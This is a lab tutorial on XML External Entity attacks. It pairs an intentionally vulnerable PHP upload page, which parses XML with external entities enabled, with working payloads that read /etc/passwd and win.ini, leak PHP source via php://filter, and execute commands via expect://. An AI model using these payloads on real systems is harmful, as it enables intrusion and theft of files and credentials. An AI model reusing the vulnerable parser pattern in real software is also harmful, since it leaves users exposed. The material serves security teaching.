Lab - XML eXternal Entity Attack

Prepare

Linux kali 3.14-kali1-686-pae

# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5

Demo Code

<html>
<body>
<h1>Process XML</h1>

<form action="" method="post" enctype="multipart/form-data">
<label for="file">Archive XML:</label>
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="submit"><br />
</form>
<hr>
<h1>Results</h1>
<?php

# error_reporting(E_ALL);
# ini_set("display_errors", 1);

if ( isset($_FILES["file"]) ) {
$doc = new DOMDocument();

$doc->validateOnParse = true;
$doc->Load($_FILES["file"]["tmp_name"]);

$tags = $doc->getElementsByTagName("data");
foreach($tags as $tag) {
echo "<pre>" . $tag->nodeValue . "</pre>\n";
}
} else {
echo "invalid xml format";
}

?>

</body>
</html>

Exploit

Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
<xxx>&message;</xxx>

Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
<somexml><message>&hello;</message></somexml>

Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>

References